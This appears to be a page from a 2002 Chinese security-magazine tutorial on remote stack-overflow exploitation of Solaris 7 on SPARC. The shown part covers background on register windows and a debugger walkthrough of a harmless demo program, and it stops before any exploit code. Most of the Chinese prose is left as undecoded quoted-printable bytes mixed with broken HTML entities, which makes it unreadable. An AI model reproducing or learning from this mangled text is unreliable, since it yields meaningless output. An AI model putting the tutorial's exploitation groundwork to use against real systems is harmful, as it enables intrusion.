|
| |
![](3D"http://www.nsfocus.net/images/mag_title.gif"=20) |
| =C2=CC=C3=CB=B0=B2=C8=AB=D4=C2=BF=AF->=B5=DA36=C6=DA->=BC=BC=CA=F5=D7=A8=CC=E2 |
=B5=DA=B6=FE=D5=C2 =D4=B6=B3=CC =
EXPLOIT SOLARIS 7/SPARC Stack=20
Overflow
=D7=F7=D5=DF=A3=BA=C4=AA=B4=F3=20
=
<master_moda@yahoo.com>
=C8=D5=C6=DA=A3=BA2002-11-01
=D2=FD=
=D7=D3=A3=BA
=CE=D2=B5=DA=D2=BB=B4=CE=CC=FD=B5=BDSolaris=B2=D9=D7=F7=
=CF=B5=CD=B3=D5=E2=B8=F6=C3=FB=D7=D6=A3=AC=BE=CD=CF=EB=CB=FC=BF=C9=C4=DC=CA=
=C7Sun=20
=
Microsystem=B5=C4=B2=FA=C6=B7=A1=A3=D2=F2=CE=AASolar=D2=B2=BE=CD=CA=C7Sun=
=B5=C4=D2=E2=CB=BC=A3=AC=CF=F3=CE=D2=C3=C7=CB=B5=B5=C4=CC=AB=D1=F4=CF=B5=A3=
=AC=D3=A2=CE=C4=BE=CD=BD=D0Solar=20
=
System=C2=EF=A1=A3=BA=F3=C0=B4=B9=FB=C8=BB=B7=A2=CF=D6=CB=FC=BE=CD=CA=C7S=
UNOS=CF=B5=CD=B3=BC=D3=C9=CFCDE(Common Desktop=20
=
Environment)=A1=A3
=BE=AD=B9=FD=C1=CB=B5=DA=D2=BB=D5=C2=B5=C4=C8=C8=
=C9=ED=D4=CB=B6=AF=A3=AC=D5=E2=D2=BB=D5=C2=B5=C4Exploit=D2=AA=C9=E6=BC=B0=
=D2=BB=D0=A9=D0=C2=C4=DA=C8=DD=A3=AC=B6=F8=C7=D2=C4=D1=B6=C8=D2=B2=D2=AA=C9=
=CF=B8=F6=CC=A8=BD=D7=A1=A3=CA=D7=CF=C8=A3=AC=D5=E2=CA=C7=B8=F6=D4=B6=B3=CC=
Exploit=A3=AC=BC=B4=D4=CB=D0=D0=D3=DA=C6=E4=CB=FB=BB=FA=C6=F7=C9=CF=B5=C4=
Server=B3=CC=D0=F2=D3=D0=C2=A9=B6=B4=A3=AC=CE=D2=C3=C7=C8=E7=BA=CE=C8=A5E=
xploit=CB=FC=B5=C4=C2=A9=B6=B4=A1=A3=D4=DA=BD=F1=CC=EC=B5=C4Distributed=BA=
=CDClient-Server=D4=CB=D0=D0=BB=B7=BE=B3=CF=C2=A3=AC=BC=C6=CB=E3=BB=FA=D6=
=AE=BC=E4=CD=A8=B9=FD=CD=F8=C2=E7=CF=B5=CD=B3=B6=F8=C1=AA=B3=C9=D2=BB=CC=E5=
=A3=AC=D4=B6=B3=CCExploit=D2=B2=B6=E0=C1=CB=C6=F0=C0=B4=A1=A3=CE=D2=BC=C7=
=B5=C3=D4=DA91=C4=EA=B5=BD93=C4=EA=BC=E4=CE=D2=B8=D5=BD=D3=B4=A5=BC=C6=CB=
=E3=BB=FA=CA=B1=A3=AC=B9=A4=D7=F7=D6=D0=BF=B4=B5=BD=B5=C4=BC=C6=CB=E3=BB=FA=
=B2=A1=B6=BE=BB=F2=B2=A1=B3=E6=B4=F3=B6=E0=CA=C7=D2=AA=CD=A8=B9=FD=C8=ED=C5=
=CC=B4=AB=B2=A5----=BE=CD=CF=F3AIDS=D2=BB=D1=F9=A3=AC=D0=E8=D2=AAPhysical=
=20
=
Contact=B2=C5=C4=DC=B4=AB=C8=BE=A1=A3=CA=B1=B4=FA=D4=DA=C7=B0=BD=F8=A3=AC=
=B2=A1=B6=BE=D2=B2=D4=DA=C7=B0=BD=F8=A3=AC=CF=D6=D4=DA=BA=DC=B6=E0=BC=C6=CB=
=E3=BB=FA=B2=A1=B6=BE=BE=CD=CF=F3=C1=F7=B8=D0=D2=BB=D1=F9=A3=AC=CD=A8=B9=FD=
=BF=D5=C6=F8=D2=B2=C4=DC=B4=AB=B2=A5=A3=AC=B5=B1=C8=BB=D5=E2=B8=F6=BF=D5=C6=
=F8=BE=CD=CA=C7=CE=DE=B4=A6=B2=BB=D4=DA=B5=C4=CD=F8=C2=E7=C1=CB=A1=A3
=
=B5=DA=B6=FE=A3=AC=D5=E2=B8=F6Exploit=CA=C7=D5=EB=B6=D4RISC=B4=A6=C0=ED=
=C6=F7=B5=C4=B4=FA=B1=ED----Sparc=BD=F8=D0=D0=B5=C4=A1=A3Sparc=B4=A6=C0=ED=
=C6=F7=C8=C3=CE=D2=CA=B5=D4=DA=CD=B7=CD=B4=A3=AC=CE=D2=BC=B8=BA=F5=D2=BB=B6=
=C8=B7=C5=C6=FA=D1=D0=BE=BFExploit=CB=FC=B5=C4=B7=BD=B7=A8=A1=A3=CE=CA=CC=
=E2=B5=C4=B9=D8=BC=FC=D4=DA=D3=DA=CB=FC=D3=EBSolaris=CF=B5=CD=B3=C9=E8=D6=
=C3=D6=D8=D6=D8=D5=CF=B0=AD=A3=AC=B7=C0=D6=B9=B4=FA=C2=EB=B4=D3=B6=D1=D5=BB=
=D6=D0=D6=B4=D0=D0=A3=AC=CF=F3=B5=DA=D2=BB=D5=C2=C4=C7=D1=F9=D4=DAIntel/x=
86=B6=D1=D5=BB=C7=F8=D4=CB=D0=D0=BA=DA=BF=CD=C2=EB=B5=C4=BA=C3=CA=B1=B9=E2=
=D2=D1=B3=C9=CD=F9=CA=C2=A1=A3=B8=F9=BE=DDSunSolve=20
Online=B5=C4=D7=CA=C1=CF=BD=E9=C9=DC=A3=AC=D4=DASparc =
V8=B4=A6=C0=ED=C6=F7=C9=CF=D4=CB=D0=D0Solaris =
V2.6=BB=F2=B8=FC=B8=DF=B0=E6=B1=BE=CA=B1=A3=AC=C8=E7=B9=FB=D4=DA/etc/syst=
em=CE=C4=BC=FE=D6=D0=C9=E8=D6=C3set=20
noexec-user-stack =
=3D1=A3=AC=BE=CD=BF=C9=D2=D4=B7=C0=D6=B9=B4=FA=C2=EB=D4=DA=B6=D1=D5=BB=D6=
=D0=D6=B4=D0=D0=A3=BB=B6=F8Sparc=20
=
V9=B4=A6=C0=ED=C6=F7=B3=FD=C1=CB=C9=CF=C3=E6=B5=C4=C8=ED=C9=E8=D6=C3=CD=E2=
=A3=AC=CB=FC=B4=D3=D3=B2=BC=FE=C9=E8=BC=C6=C9=CF=B8=F9=B1=BE=BE=CD=B2=BB=C8=
=C364=CE=BB=B4=FA=C2=EB=D4=DA=B6=D1=D5=BB=D6=D0=D6=B4=D0=D0=A1=A3=CB=F9=D2=
=D4=CE=D2=D5=E2=C0=EF=C9=E8=BC=C6=B5=C4Exploit=C0=FD=D7=D3=CA=C7=C8=C3=BA=
=DA=BF=CD=C2=EB=D4=DAHEAP=C7=F8=D4=CB=D0=D0=A1=A3
=CB=E4=C8=BB=D5=E2=
=B8=F6=C0=FD=D7=D3=D6=D0=BA=DA=BF=CD=C2=EB=D4=DAHEAP=C7=F8=D4=CB=D0=D0=A3=
=AC=B5=AB=C9=E8=BC=C6=B5=C4Overflow=C8=B4=B2=A2=B2=BB=D4=DAHeap=C7=F8=A1=A3=
=D0=D0=BC=D2=C3=C7=B6=BC=B9=AB=C8=CF----=CE=D2=B5=B1=C8=BB=BD=F4=B8=FA=D0=
=D0=BC=D2=C3=C7=B5=C4=D2=E2=BC=FB=A3=AC=B6=D4Heap=C7=F8Overflow=B5=C4Expl=
oit=D2=AA=B1=C8=B6=D1=D5=BB=D6=D0=B5=C4=C4=D1=A1=A3=C4=D1=BE=CD=C4=D1=D4=DA=
=B2=BB=D6=AA=B5=C0Overflow=B5=C4=C4=BF=B1=EA=CA=C7=CA=B2=C3=B4=A3=BF=CF=F3=
=B5=DA=D2=BB=D5=C2=B7=A2=C9=FA=D4=DA=B6=D1=D5=BB=C7=F8=B5=C4Overflow=C4=BF=
=B1=EA=BA=DC=C3=F7=C8=B7=A3=AC=C4=C7=BE=CD=CA=C7=BD=F4=BF=BF=D7=C5=BB=BA=B3=
=E5=C7=F8=B5=C4=B1=BB=B5=F7=D3=C3=BA=AF=CA=FD=B5=C4=B7=B5=BB=D8=B5=D8=D6=B7=
=A3=AC=D5=E2=D4=DASparc=BB=FA=C6=F7=C9=CF=B5=C4HEAP=C4=DA=B4=E6=CA=C7=B2=BB=
=BF=C9=C4=DC=B5=C4=A1=A3=CB=F9=D2=D4=CE=D2=BD=ABOverflow=C9=E8=BC=C6=D4=DA=
=B6=D1=D5=BB=C7=F8=B7=A2=C9=FA=A3=AC=C8=BB=BA=F3=CC=F8=B5=BDHEAP=C7=F8=C8=
=A5=D6=B4=D0=D0=BA=DA=BF=CD=C2=EB=A1=A3
Sparc=B4=A6=C0=ED=C6=F7=B1=
=B3=BE=B0=D6=AA=CA=B6=BD=E9=C9=DC=A3=BA
=CF=C8=C0=B4=D2=BB=B5=E3=B9=
=D8=D3=DASparc=B4=A6=C0=ED=C6=F7=B5=C4=B1=B3=BE=B0=D6=AA=CA=B6=BD=E9=C9=DC=
=A1=A3=D7=F7=CE=AARISC=D0=CD=B4=A6=C0=ED=C6=F7=A3=ACSparc=B5=C4=D6=B8=C1=EE=
=C8=BA=B0=FC=BA=AC=CD=A8=D3=C3=B6=F8=D3=D0=CF=DE=B5=C4=D6=B8=C1=EE=A3=AC=D1=
=B0=D6=B7=B7=BD=CA=BD=BD=CF=C9=D9=A1=A3=CB=FC=B5=C4=D6=B8=C1=EE=B3=A4=B6=C8=
=B9=CC=B6=A8=A3=AC=D3=EB=BC=C4=B4=E6=C6=F7=B3=A4=B6=C8(32=CE=BB=BB=F264=CE=
=BB)=D2=BB=D1=F9----=CE=D2=C3=C7=D5=E2=C0=EF=D6=BB=D1=D0=BE=BF32=CE=BB=B5=
=C4=D6=B8=C1=EE=A1=A3=C1=ED=D2=BB=B7=BD=C3=E6=A3=ACSparc=B4=A6=C0=ED=C6=F7=
=BE=DF=D3=D0=B4=F3=C1=BF=B5=C4=CD=A8=D3=C3=BC=C4=B4=E6=C6=F7=A3=AC=CE=D2=BF=
=B4=B5=BD=B5=C4=D7=CA=C1=CF=CF=D4=CA=BE=A3=ACSparc=20
=
V8=BE=CD=D3=D040=B5=BD520=B8=F6=BC=C4=B4=E6=C6=F7=A3=AC=D5=E2=D0=A9=BC=C4=
=B4=E6=C6=F7=B1=BB=B7=D6=B3=C9=B6=E0=B8=F6=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA(=
Register=20
=
Window)=A1=A3=D4=DA=B3=CC=D0=F2=D4=CB=D0=D0=CA=B1=A3=AC=BC=C4=B4=E6=C6=F7=
=B4=B0=BF=DA=D6=D0=B1=A3=B4=E6=D7=C5=B5=B1=C7=B0=BD=F8=B3=CC=B5=C4=D7=B4=CC=
=AC(STATUS)=D0=C5=CF=A2=A1=A3=C8=CE=BA=CE=CA=B1=BA=F2=BD=F8=B3=CC=D6=BB=C0=
=FB=D3=C3=B5=BD=D2=BB=B8=F6=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA=A3=AC=D6=BB=D3=D0=
=B7=A2=C9=FA=BA=AF=CA=FD=B5=F7=D3=C3=BB=F2=B7=B5=BB=D8=CA=B1=A3=ACSparc=D6=
=B4=D0=D0=D6=B8=C1=EEsave=BB=F2restore=A3=AC=BD=F8=B3=CC=B2=C5=BB=E1=D4=DA=
=B2=BB=CD=AC=B5=C4=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA=BC=E4=D2=C6=B6=AF(SHIFT)=
=A1=A3
=D4=DASolaris=B2=D9=D7=F7=CF=B5=CD=B3=C6=F4=B6=AF=BA=F3=B2=BB=
=BE=C3=A3=AC=BA=AF=CA=FD=B5=F7=D3=C3=D2=BB=B8=F6=CC=D7=D2=BB=B8=F6=A3=AC=BA=
=DC=BF=EC=BE=CD=BB=E1=B0=D1=CB=F9=D3=D0=B5=C4=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA=
=D5=BC=D3=C3=A1=A3=C4=C7=C3=B4=BD=D3=CF=C2=C0=B4=B5=C4=BA=AF=CA=FD=B5=F7=D3=
=C3=BD=AB=BB=E1=B5=BC=D6=C2=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA=C3=C7=D2=D4FIFO=
(First=20
In First=20
=
Out)=B5=C4=B7=BD=CA=BD=D2=E7=B3=F6=A3=BA=D7=EE=D4=E7=B1=BB=D3=C3=B5=BD=B5=
=C4=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA=B5=C4=C4=DA=C8=DD=B1=BB=BF=BD=B1=B4=B5=BD=
=C4=DA=B4=E6=D6=D0=A3=AC=D5=E2=D0=A9=B1=BB=BF=BD=B1=B4=B5=C4=C4=DA=C8=DD=D5=
=BC=BE=DD=D7=C5=D2=BB=BF=E9=B6=D1=D5=BB=BF=D5=BC=E4=A3=AC=CE=D2=C3=C7=B9=C3=
=C7=D2=B3=C6=CB=FC=CE=AA=B6=D1=D5=BB=BF=E9(Stack=20
=
Frame)=A3=BB=C8=BB=BA=F3=D5=E2=B8=F6=BF=D5=B3=F6=C0=B4=B5=C4=B4=B0=BF=DA=BE=
=CD=B1=BB=D0=C2=B5=C4=BA=AF=CA=FD=B5=F7=D3=C3=D5=F7=D3=C3=A1=A3
=B0=
=D9=CE=C5=B2=BB=C8=E7=D2=BB=BC=FB=A3=AC=CE=D2=D3=C3=CF=C2=C3=E6=B5=C4dumm=
y.c=B3=CC=D0=F2=C0=B4=D1=DD=CA=BE=D2=BB=CF=C2=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA=
=D3=EB=B6=D1=D5=BB=BF=E9=B5=C4=B8=C5=C4=EE=A1=A3
<=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3Ddummy.c=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D>
#include<stdio.h>
foo2=20
( char * str )
{
=20
printf("Input String is %s in foo2 \n", =
str);
}
foo1 (=20
char * str )
{
=20
printf("entered foo1 =
\n");
=20
foo2(str);
=
printf("leaving=20
foo1 \n");
}
main (int argc, char*=20
argv[])
{
foo1( =
argv[1]=20
=
);
}
<=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D>
=D5=E2=C0=EF=CE=
=D2=D3=C3=B5=C4=BB=FA=C6=F7beijing=A3=BBbeijing=20
=B5=C4=B4=A6=C0=ED=C6=F7=CA=C7Sparc =
V9=A3=AC=D4=CB=D0=D0Solaris =
7=A1=A3=D3=EB=C9=CF=D2=BB=D5=C2=D3=C3=B5=BD=B5=C4GNU=B9=A4=BE=DF=B2=BB=D2=
=BB=D1=F9=A3=AC=D5=E2=C0=EF=CE=D2=D3=C3=B5=C4=B1=E0=D2=EB=B9=A4=BE=DF=CA=C7=
cc=A3=AC debug=B9=A4=BE=DF=CA=C7adb=A1=A3=20
=
=CF=C8=D3=C3cc=B0=D1=B3=CC=D0=F2=B1=E0=D2=EB=A1=A3
[moda@beiji=
ng]$ cc dummy.c -o=20
=
dummy
=D4=D9=D3=C3adb=B6=D4dummy=BD=F8=D0=D0debug=B7=D6=CE=F6=A1=A3=
adb=CA=C7=BE=DF=D3=D0=D3=C6=BE=C3=C0=FA=CA=B7=B5=C4debugger=A3=AC=CB=FC=B5=
=C4=CA=B9=D3=C3=B7=BD=B7=A8=D3=EBgdb=B2=EE=B2=BB=CC=AB=B6=E0----=D6=BB=CA=
=C7=B8=FC=B2=BB=B7=BD=B1=E3=B6=F8=D2=D1=A1=A3
[moda@beijing]$=20
adb=20
=
dummy
main:b
foo1:b
foo2:b &n=
bsp;
/*
=B7=D6=B1=F0=D4=DAmain,foo1,f=
oo2=C9=E8=D6=C3=B6=CF=B5=E3=A1=A3=BD=D3=D7=C5=BF=AA=CA=BC=D4=CB=D0=D0=A3=AC=
=CA=E4=C8=EB=B2=CE=CA=FD=CE=AA=D7=D6=B7=FB=B4=AE"ABCD" &=
nbsp;
*/
:r=20
=
ABCD &nb=
sp;
breakpoint=20
=
at:
main: =
save %sp, -0x60,=20
=
%sp
/*
=B3=CC=D0=F2=
=D4=DD=CD=A3=D4=DA=B6=CF=B5=E3main=A1=A3=CF=C2=C3=E6Single=20
=
Step=D6=B4=D0=D0save=D6=B8=C1=EE=A3=AC=D5=E2=B8=F6=D6=B8=C1=EE=D2=C6=B6=AF=
=C1=CB=B3=CC=D0=F2=B5=B1=C7=B0=B5=C4=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA=A1=A3<=
BR>*/
:S
stopped=20
=
at:
main+4: =20
st %i1, [%fp +=20
=
0x48]
/*
=D5=E2=CA=B1=B3=CC=D0=F2=D2=D1=BE=AD=BD=F8=C8=EBmain,=CD=A3=
=C1=F4=D4=DAmain+4=A1=A3=CE=D2=C3=C7=D3=C3$r=C3=FC=C1=EE=CF=D4=CA=BE=B5=B1=
=C7=B0=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA=B5=C4=C4=DA=C8=DD=A3=BA
*/
$r&=
nbsp; g0 0 &n=
bsp; &nb=
sp; &nbs=
p;=20
=
l0 0
g1 ff19=
5f20 _return_zero &nb=
sp; l1 0
g2&=
nbsp; 0 &=
nbsp; &n=
bsp; =20
=
l2 0
g3 0&nb=
sp; &nbs=
p; =
; =20
=
l3 0
g4 0&nb=
sp; &nbs=
p; =
; =20
=
l4 0
g5 0&nb=
sp; &nbs=
p; =
; =20
=
l5 0
g6 0&nb=
sp; &nbs=
p; =
; =20
=
l6 0
g7 0&nb=
sp; &nbs=
p; =
; =20
=
l7 0
o0 0&nb=
sp; &nbs=
p; =
; =20
=
i0 2
o1 0&nb=
sp; &nbs=
p; =
; =20
=
i1 ffbefd24
o2 &nb=
sp;0 &nb=
sp; &nbs=
p; =20
=
i2 ffbefd30
o3 &nb=
sp;0 &nb=
sp; &nbs=
p; =20
=
i3 20800
o4 =
0 =
&=
nbsp; =20
=
i4 0
o5 0&nb=
sp; &nbs=
p; =
; =20
=
i5 0
sp ffbe=
fc60 &nb=
sp; &nbs=
p; fp ffbefcc0
o7 &=
nbsp; 0 &=
nbsp; &n=
bsp; =20
=
i7 106a0 =
=20
_start+0xb8
y 0
tstate:=20
4482001a07 (ccr=3D0x44, asi=3D0x82, =
pstate=3D0x1a,=20
cwp=3D0x7)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 =
cle:0=20
mg:0 ig:0
pc 1074c=20
=
main+4: =
=20
st %i1, [%fp +=20
0x48]
npc 10750=20
=
main+8: =
=20
st %i0, [%fp +=20
0x44]
/*
pc=CE=AAProgram=20
=
Counter=BC=C4=B4=E6=C6=F7=A3=AC=CB=FC=B1=A3=B4=E6=D3=D0=B5=B1=C7=B0=BB=FA=
=C6=F7=D6=B8=C1=EE=B5=C4=B5=D8=D6=B7---=CF=D6=D4=DA=CA=C71074C(main+4)=A3=
=ACnpc=CE=AANext Program=20
=
Counter=BC=C4=B4=E6=C6=F7=A3=AC=D2=B2=BE=CD=CA=C7=CF=C2=D2=BB=B8=F6=BD=AB=
=D2=AA=D6=B4=D0=D0=B5=C4=BB=FA=C6=F7=D6=B8=C1=EE=B5=C4=B5=D8=D6=B710750=A1=
=A3
g0-g7=BC=C4=B4=E6=C6=F7=B1=A3=B4=E6=B3=CC=D0=F2=B5=C4=C8=AB=BE=
=D6=B1=E4=C1=BF(Global=20
=
Variable)=A3=ACl0-l7=BC=C4=B4=E6=C6=F7=B1=A3=B4=E6=BE=D6=B2=BF=B1=E4=C1=BF=
(Local=20
=
Variable)=A1=A3i0-i7=CA=E4=C8=EB=BC=C4=B4=E6=C6=F7=B1=A3=B4=E6=D3=D0=B5=B1=
=C7=B0=BA=AF=CA=FD(=D5=E2=C0=EF=CA=C7main)=B5=C4=CA=E4=C8=EB=B2=CE=CA=FD=A1=
=A3
=CF=B8=D0=C4=B5=C4=C5=F3=D3=D1=BB=E1=D7=A2=D2=E2=B5=BDi6=BC=C4=
=B4=E6=C6=F7=B1=BBfp=CB=F9=B4=FA=CC=E6=A3=AC=CB=FC=CA=B5=BC=CA=C9=CF=CA=C7=
=D6=B8=CF=F2=BD=F8=B3=CC=C9=CF=D2=BB=B6=D1=D5=BB=BF=E9(Stack=20
=
Frame)=B5=C4=D6=B8=D5=EB=A3=BB=B6=F8i7=BC=C4=B4=E6=C6=F7=D2=B2=CA=C7=D2=BB=
=B8=F6=D6=B8=D5=EB=A3=AC=CB=FC=D6=B8=CF=F2=B5=F7=D3=C3=B5=B1=C7=B0=BA=AF=CA=
=FD(=D4=DA=D5=E2=C0=EF=BE=CD=CA=C7=B5=F7=D3=C3main=BA=AF=CA=FD)=B5=C4=BB=FA=
=C6=F7=D6=B8=C1=EE=A3=AC=CD=A8=B3=A3=D5=E2=CA=C7=B8=F6call=D6=B8=C1=EE=BB=
=F2jump=D6=B8=C1=EE=A1=A3
o0-o7=CA=E4=B3=F6=BC=C4=B4=E6=C6=F7=B4=E6=
=D3=D0=B5=B1=C7=B0=BA=AF=CA=FDmain=B5=C4=CA=E4=B3=F6=B2=CE=CA=FD=A3=AC=B5=
=AB=B5=B1main=BA=AF=CA=FD=B5=F7=D3=C3=C6=E4=CB=FB=BA=AF=CA=FD(=C8=E7foo1)=
=CA=B1=A3=ACo0-o7=BE=CD=B3=C9=CE=AA=B1=BB=B5=F7=D3=C3=BA=AF=CA=FD(=C8=E7f=
oo1)=B5=C4=CA=E4=C8=EB=BC=C4=B4=E6=C6=F7i0-i7=A3=AC=CF=D6=D4=DA=B4=F3=BC=D2=
=BF=B4=B5=BD=CB=FC=C3=C7=B5=C4=B6=BC=CA=C70----=B3=FD=C1=CBo6=A1=A3o6=BC=C4=
=B4=E6=C6=F7=D2=B2=BE=CD=CA=C7sp=BC=C4=B4=E6=C6=F7=A3=AC=CB=FC=B1=A3=B4=E6=
=D7=C5=B5=B1=C7=B0=BA=AF=CA=FD=B6=D1=D5=BB=BF=E9=D6=B8=D5=EB=A1=A3
=D4=D9=BB=D8=CD=B7=BF=B4=BF=B4=B5=B1=C7=B0=BA=AF=CA=FDmain=B5=C4=CA=E4=C8=
=EB=BC=C4=B4=E6=C6=F7=A3=AC=CE=AA=CA=B2=C3=B4i0=B5=BDi3=BC=C4=B4=E6=C6=F7=
=C0=EF=C3=E6=B6=BC=D3=D0=B7=C7=C1=E3=B5=C4=C4=DA=C8=DD=A3=BF=C4=D1=B5=C0m=
ain=BA=AF=CA=FD=D3=D0=C4=C7=C3=B4=B6=E0=CA=E4=C8=EB=B2=CE=CA=FD=A3=BF=A3=A1=
=B5=DA=D2=BB=B8=F6=CA=C7=CA=E4=C8=EB=B2=CE=CA=FD=B5=C4=D7=DC=CA=FDargc=20
=3D =
2=A3=BB=B5=DA=B6=FE=B8=F6=CE=AA=CA=E4=C8=EB=B2=CE=CA=FD=BE=D8=D5=F3=D6=B8=
=D5=EB*argv[]=3Dffbefd24=20
=
(=D4=DA=CF=C2=C3=E6=CE=D2=C3=C7=B0=D1ffbefd24=BE=D8=D5=F3=D6=D0=B5=C4=C1=BD=
=B8=F6=D7=D6=B7=FB=B4=AE=B7=D6=B1=F0=D2=D4/S=B8=F1=CA=BD=CA=E4=B3=F6=A3=AC=
=C4=E3=C3=C7=BF=C9=D2=D4=BF=B4=B5=BD=CB=FC=C3=C7=C8=B7=CA=B5=CA=C7=B3=CC=D0=
=F2dummy=B5=C4=CA=E4=C8=EB=B2=CE=CA=FDargv[0]=3D"dummy"=BA=CDargv[1]=3D"A=
BCD")=A3=BB=B5=DA=C8=FD=B8=F6=BA=C3=CF=F3=CA=C7=B3=CC=D0=F2=D4=CB=D0=D0=B5=
=C4=BB=B7=BE=B3=B1=E4=C1=BF=BE=D8=D5=F3=D6=B8=D5=EB=A3=AC=D2=F2=CE=AA=CB=FC=
=D6=B8=CF=F2=BB=B7=BE=B3=B1=E4=C1=BF_INIT_UTS_RELEASE=A1=A2_INIT_UTS_VERS=
ION=A1=A2path=B5=C8=B5=C8=A3=BB=D7=EE=BA=F3=D2=BB=B8=F620800=CA=C7=CA=B2=C3=
=B4=C4=D8=A3=BF
=C6=E4=CA=B5=D6=BB=D3=D0i0=D3=EBi1=BC=C4=B4=E6=C6=F7=
=B5=C4=C4=DA=C8=DD=CA=C7=B1=BB=BA=AF=CA=FDmain=D3=C3=B5=BD=B5=C4=A3=AC=D2=
=B2=BE=CD=CA=C7=CE=D2=C3=C7=D4=B4=B3=CC=D0=F2=D6=D0=B5=C4=CA=E4=C8=EB=B2=CE=
=CA=FDargc=D3=EBargv[]=A3=AC=CF=B5=CD=B3=D4=DA=B5=F7=D3=C3main=BA=AF=CA=FD=
=C7=B0=B2=A2=C3=BB=D3=D0=B3=F5=CA=BC=BB=AFi2=D3=EBi3=BC=C4=B4=E6=C6=F7=A3=
=AC=CB=F9=D2=D4=CB=FC=C3=C7=B1=A3=C1=F4=D7=C5=D2=D4=C7=B0=B5=C4=C4=DA=C8=DD=
=A1=A3
*/
ffbefd24/4X =
ffbefd24: =20
=
ffbefe00 ffbefe06 &nb=
sp; 0 &nb=
sp; =20
=
ffbefe0b
ffbefe00/S &nb=
sp;
ffbefe00: =20
=
dummy
ffbefe06/S
ffbefe06: =
; =20
=
ABCD
/*
=BC=C4=B4=E6=C6=F7sp=D3=EBfp=BE=F9=CE=AA=D6=B8=CF=F2=B6=D1=D5=
=BB=BF=E9(Stack=20
=
Frame)=B5=C4=D6=B8=D5=EB=A3=AC=C4=C7=C3=B4=B6=D1=D5=BB=BF=E9=B5=C4=BD=E1=B9=
=B9(STRUCTURE)=CA=C7=D4=F5=D1=F9=B6=A8=D2=E5=B5=C4=C4=D8=A3=BF=CB=FC=B5=C4=
=B6=A8=D2=E5=D4=DA/usr/include/system/frame.h=20
=D6=D0=BF=C9=D2=D4=D5=D2=B5=BD=A3=BA
struct frame=20
=
{
long &nbs=
p; fr_local[8]; =
; /*=20
saved locals=20
=
*/
long &nb=
sp; fr_arg[6]; =
/*=20
saved arguments [0 - 5]=20
*/
struct =
=
frame *fr_savfp; &nbs=
p;/*=20
saved frame pointer=20
=
*/
long &nb=
sp; fr_savpc; &=
nbsp; =20
/* saved program counter */
#if=20
=
!defined(__sparcv9)
ch=
ar *fr_stret; &=
nbsp; /*=20
struct return addr */
#endif /* __sparcv9=20
=
*/
long &nb=
sp; fr_argd[6]; =
; =20
/* arg dump area=20
=
*/
long &nb=
sp; fr_argx[1]; =
; =20
/* array of args past the sixth=20
=
*/
};
=B8=F9=BE=DD=B6=D1=D5=BB=BF=E9=B5=C4=B6=A8=D2=E5=A3=AC=D4=
=DA=C6=E4STRUCTURE=B5=C4=B5=DA56=BB=F20x38=D7=D6=BD=DA(8 * 4 + 6 * 4 =3D =
56=20
=
=D7=D6=BD=DA)=B4=A6=CE=AA=D6=B8=CF=F2=C9=CF=D2=BB=B6=D1=D5=BB=BF=E9=B5=C4=
=D6=B8=D5=EB=A3=AC=D3=A6=B8=C3=D3=EB%fp=D2=BB=D1=F9=A3=AC=B5=DA60(0x3C)=D7=
=D6=BD=DA=B4=A6=CE=AA=B5=F7=D3=C3=B5=B1=C7=B0=BA=AF=CA=FD=B5=C4=BB=FA=C6=F7=
=D6=B8=C1=EE=B5=D8=D6=B7=A3=AC=D3=A6=B8=C3=D3=EB%i7=D2=BB=D1=F9=A1=A3=C4=C7=
=C3=B4=CA=C7=B2=BB=CA=C7=D5=E2=D1=F9=C4=D8=A3=BF=D4=DA=CF=C2=C3=E6=CE=D2=C3=
=C7=B0=D1=B4=D3%sp=3Dffbefc60=BF=AA=CA=BC=B5=C4=B5=B1=C7=B0=B6=D1=D5=BB=BF=
=E9=C4=DA=C8=DD=D3=C3/24X=B8=F1=CA=BD=CF=D4=CA=BE=B3=F6=C0=B4=A3=BA=D4=DA=
=B5=B1=C7=B0=B6=D1=D5=BB=BF=E9%sp+0x38=B4=A6=B5=C4=C4=DA=C8=DD=C8=B7=CA=B5=
=CA=C70xffbefcc0=A3=AC=D2=B2=BE=CD=CA=C7=BC=C4=B4=E6=C6=F7fp=D6=D0=B5=C4=C4=
=DA=C8=DD=A3=AC=D4=DA%sp+0x3C=D6=D0=B5=C4=C8=B7=CA=B5=CA=C7=B5=F7=D3=C3ma=
in=BA=AF=CA=FD=B5=C4=BB=FA=C6=F7=D6=B8=C1=EE=B5=D8=D6=B7=A3=AC=D2=B2=BE=CD=
=CA=C7i7=B5=C4=C4=DA=C8=DD106a0=A1=A3
*/
ffbefc60/24X
ffbefc60:&=
nbsp; =20
=
0 =
=20
=
0 =
=20
=
0 =
=20
=
0
&n=
bsp; 0 &n=
bsp; =20
=
0 =
=20
=
0 =
=20
=
0
&n=
bsp; 2 &n=
bsp; =20
=
ffbefd24 ffbefd30 &nb=
sp; 20800
&=
nbsp; 0&=
nbsp; &n=
bsp; =20
=
0 =
=20
=
ffbefcc0 106a0
&n=
bsp; &nb=
sp; ff3bb0ec 20=
800 =20
=
0 =
=20
=
0
&n=
bsp; 0 &n=
bsp; =20
=
0 =
=20
=
ffbefcc0 10674
main+4/8=
i =
main+4: =20
st %i1, [%fp +=20
=
0x48]
&nbs=
p; st %i0=
,=20
[%fp +=20
=
0x44]
&nbs=
p; or %i1=
,=20
%g0,=20
=
%l0
=
call foo1 =
; //=B8=C3=D6=B8=C1=EE=B5=D8=D6=B7=CE=AA=
10758
&nbs=
p; ld [%l=
0=20
+ 0x4],=20
=
%o0
=
ret
=
